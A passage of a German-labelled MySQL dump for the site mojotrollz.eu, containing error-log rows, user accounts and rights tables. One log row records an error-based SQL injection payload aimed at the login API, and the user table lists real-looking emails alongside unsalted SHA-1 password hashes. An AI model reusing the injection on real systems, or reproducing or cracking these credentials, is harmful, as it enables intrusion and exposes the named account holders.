'http://www.mojotrollz.eu/', 'Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.1', 0, b'0', 0, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (967, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 8; statics: 0; req_command: 2; req_param: 3; opt_param: 0; url: /api.php?call=account&action=login&username=%27and(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(database()))%20FROM%20information_schema.tables%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)--+-&pass=%22%27and(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(database()))%20FROM%20information_schema.tables%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)--+-%22&action=login&x=0&y=0&password_sha=e93b4e3c464ffd51732fbd6ded717e9efda28aad&password_md5=5d793fc5b00a2348c3fb9ab59e5ca98a', '3609d1c35d89443f9cd80023d0a86dbc52bb17c4', 1, '/home/web/web/stable/mojotrollz/lib/system/api/api.php', 107, '#0 /home/web/web/stable/mojotrollz/lib/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/web/stable/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '93.115.87.78', 0.008, '2015-09-12 22:57:44', 'www.mojotrollz.eu', 80, '/api.php?call=account&action=login&username=%27and(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(database()))%20FROM%20information_schema.tables%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.1', 0, b'0', 0, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (968, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 2; statics: 0; req_command: 1; req_param: 0; opt_param: 0; url: /api.php?call=open_tunnel&url=', '72448a72979b3e96ec38bf7875dd93b13b9273c1', 1, '/home/web/web/stable/mojotrollz/lib/system/api/api.php', 107, '#0 /home/web/web/stable/mojotrollz/lib/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/web/stable/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '93.204.65.85', 0.048, '2015-09-23 15:02:18', 'www.mojotrollz.eu', 80, '/api.php?call=open_tunnel&url=', 'a:0:{}', 'http://www.mojotrollz.eu/web/test/lan/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36', 0, b'0', 0, 1, 0, 0, NULL); /*!40000 ALTER TABLE `system_todo` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_todo_assign CREATE TABLE IF NOT EXISTS `system_todo_assign` ( `todo` int(10) NOT NULL, `user` int(10) unsigned NOT NULL, `time` datetime NOT NULL, PRIMARY KEY (`todo`,`user`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci; -- Exportiere Daten aus Tabelle host_mojotrollz.system_todo_assign: ~0 rows (ungefähr) /*!40000 ALTER TABLE `system_todo_assign` DISABLE KEYS */; /*!40000 ALTER TABLE `system_todo_assign` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_user CREATE TABLE IF NOT EXISTS `system_user` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `username` char(32) NOT NULL, `password_sha` char(255) DEFAULT NULL, `password_md5` char(255) DEFAULT NULL, `email` char(255) NOT NULL, `joindate` int(10) NOT NULL, `locale` char(6) NOT NULL DEFAULT 'enUS', `last_active` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, `account_flag` int(10) DEFAULT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=34 DEFAULT CHARSET=utf8; -- Exportiere Daten aus Tabelle host_mojotrollz.system_user: 18 rows /*!40000 ALTER TABLE `system_user` DISABLE KEYS */; INSERT INTO `system_user` (`id`, `username`, `password_sha`, `password_md5`, `email`, `joindate`, `locale`, `last_active`, `account_flag`) VALUES (10, 'ulf', '90009b3fb5a425808fe9398bc9ff55e93ae283ab', NULL, 'rylon@web.de', 0, 'deDE', '2015-09-09 07:04:49', 1); INSERT INTO `system_user` (`id`, `username`, `password_sha`, `password_md5`, `email`, `joindate`, `locale`, `last_active`, `account_flag`) VALUES (11, 'Naeltard', 'fdf398827e3f99363587eac6d24e0f9d52fa916e', NULL, 't.rechel@gmx.de', 0, 'deDE', '2015-03-12 15:02:32', 1); INSERT INTO `system_user` (`id`, `username`, `password_sha`, `password_md5`, `email`, `joindate`, `locale`, `last_active`, `account_flag`) VALUES (12, 'Chris', '01b4b25ecdf3a48cb308ef03233f5c4cbffda65a', NULL, 'gehbauer.christoph@web.de', 0, 'deDE', '0000-00-00 00:00:00', 1); INSERT INTO `system_user` (`id`, `username`, `password_sha`, `password_md5`, `email`, `joindate`, `locale`, `last_active`, `account_flag`) VALUES (13, 'AbsolutSeppl', 'a2b297f0f915f94f3750d92e9eab1836296d8406', NULL, 's.rechel@gmx.de', 0, 'deDE', '2015-01-06 18:47:51', 1); INSERT INTO `system_user` (`id`, `username`, `password_sha`, `password_md5`, `email`, `joindate`, `locale`, `last_active`, `account_flag`) VALUES (14, 'Xerion', '87e16c96b06a86aeac74fe9f01f0412d50721f0e', NULL, 'gehbauer.christoph@web.de', 0, 'deDE', '2014-12-21 22:55:04', 1); INSERT INTO `system_user` (`id`, `username`, `password_sha`, `password_md5`, `email`, `joindate`, `locale`, `last_active`, `account_flag`) VALUES (21, 'rylon', '90009b3fb5a425808fe9398bc9ff55e93ae283ab', NULL, 'rylon@web.de', 0, 'enUS', '2015-09-09 07:03:27', 1); INSERT INTO `system_user` (`id`, `username`, `password_sha`, `password_md5`, `email`, `joindate`, `locale`, `last_active`, `account_flag`) VALUES (22, 'Nael', 'fdf398827e3f99363587eac6d24e0f9d52fa916e', NULL, 't.rechel@gmx.de', 0, 'enUS', '2014-12-30 00:23:07', 1); INSERT INTO `system_user` (`id`, `username`, `password_sha`, `password_md5`, `email`, `joindate`, `locale`, `last_active`, `account_flag`) VALUES (23, 'Chriz', '87e16c96b06a86aeac74fe9f01f0412d50721f0e', NULL, 'gehbauer.christoph@web.de', 0, 'enUS', '2015-01-07 20:55:58', 1); INSERT INTO `system_user` (`id`, `username`, `password_sha`, `password_md5`, `email`, `joindate`, `locale`, `last_active`, `account_flag`) VALUES (24, 'Seppuku', 'a2b297f0f915f94f3750d92e9eab1836296d8406', NULL, 's.rechel@gmx.de', 0, 'enUS', '2014-12-30 02:49:32', 1); INSERT INTO `system_user` (`id`, `username`, `password_sha`, `password_md5`, `email`, `joindate`, `locale`, `last_active`, `account_flag`) VALUES (25, 'citrusfresh', '9d8954525d80ef16813bbd1b0c82f6c6ea3638cd', NULL, 'zero24@gmx.net', 0, 'enUS', '2014-12-30 03:23:32', 1); INSERT INTO `system_user` (`id`, `username`, `password_sha`, `password_md5`, `email`, `joindate`, `locale`, `last_active`, `account_flag`) VALUES (26, 'nael2', 'fdf398827e3f99363587eac6d24e0f9d52fa916e', NULL, 't.rechel@gmx.de', 0, 'enUS', '2014-12-30 05:52:12', 1); INSERT INTO `system_user` (`id`, `username`, `password_sha`, `password_md5`, `email`, `joindate`, `locale`, `last_active`, `account_flag`) VALUES (27, 'Timbobo', 'd353af34a794c6f871a2eb2789a28d0bc75cc01f', NULL, 'froeschl.s@gmx.de', 0, 'enUS', '2014-12-30 21:18:05', 1); INSERT INTO `system_user` (`id`, `username`, `password_sha`, `password_md5`, `email`, `joindate`, `locale`, `last_active`, `account_flag`) VALUES (28, 'Timbobo123', 'd353af34a794c6f871a2eb2789a28d0bc75cc01f', NULL, 'froeschl.s@gmx.de', 0, 'enUS', '2014-12-30 21:18:26', 1); INSERT INTO `system_user` (`id`, `username`, `password_sha`, `password_md5`, `email`, `joindate`, `locale`, `last_active`, `account_flag`) VALUES (29, 'Sydney', '04df4ddeb7ea6438f8c41bb00f6969502c375acd', NULL, 'Anja_I_Hoffmann@yahoo.de', 0, 'enUS', '2014-12-31 00:57:36', 1); INSERT INTO `system_user` (`id`, `username`, `password_sha`, `password_md5`, `email`, `joindate`, `locale`, `last_active`, `account_flag`) VALUES (30, 'shibo', 'de2afcb8bf2d340cc30ccead55b97e000b0283ca', NULL, 'lol.lig@gmx.de', 0, 'enUS', '2015-01-03 22:18:54', 1); INSERT INTO `system_user` (`id`, `username`, `password_sha`, `password_md5`, `email`, `joindate`, `locale`, `last_active`, `account_flag`) VALUES (31, 'yonderlaya', '6e4990783ec531f41f656209f1d984219167479c', NULL, 'yonder19-06@hotmail.com', 0, 'enUS', '2015-02-02 15:35:58', 1); INSERT INTO `system_user` (`id`, `username`, `password_sha`, `password_md5`, `email`, `joindate`, `locale`, `last_active`, `account_flag`) VALUES (32, 'vextacular', '8704af068f37cb5fc44d947cb875c5ac0bfe0a54', NULL, 'sfgyulh@mailinator.com', 0, 'enUS', '2015-05-16 20:37:37', 1); INSERT INTO `system_user` (`id`, `username`, `password_sha`, `password_md5`, `email`, `joindate`, `locale`, `last_active`, `account_flag`) VALUES (33, 'Rikkudo', '64e5defaed355eedb42b1edffaa6659adacce553', NULL, 'Guillaume.cote07@gmail.com', 0, 'enUS', '2015-05-22 05:39:27', 1); /*!40000 ALTER TABLE `system_user` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_user_to_rights CREATE TABLE IF NOT EXISTS `system_user_to_rights` ( `rightID` int(10) NOT NULL DEFAULT '0', `userID` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`rightID`,`userID`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; -- Exportiere Daten aus Tabelle host_mojotrollz.system_user_to_rights: ~25 rows (ungefähr) /*!40000 ALTER TABLE `system_user_to_rights` DISABLE KEYS */; INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (1, 10); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (1, 11); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (1, 12); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (1, 13); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (1, 14); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (1, 23); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (1, 30); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (5, 10); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (5, 11); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (5, 13); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (6, 10); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (6, 11); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (6, 13); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (10, 10); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (10, 13); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (10, 14); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (10, 23); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (15, 10); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (15, 13); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (15, 14); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (15, 23); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (20, 10); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (20, 11); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (21, 10); INSERT INTO `system_user_to_rights` (`rightID`, `userID`) VALUES (25, 10); /*!40000 ALTER TABLE `system_user_to_rights` ENABLE KEYS */; /*!40101 SET SQL_MODE=IFNULL(@OLD_SQL_MODE, '') */; /*!40014 SET FOREIGN_KEY_CHECKS=IF(@OLD_FOREIGN_KEY_CHECKS IS NULL, 1, @OLD_FOREIGN_KEY_CHECKS) */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;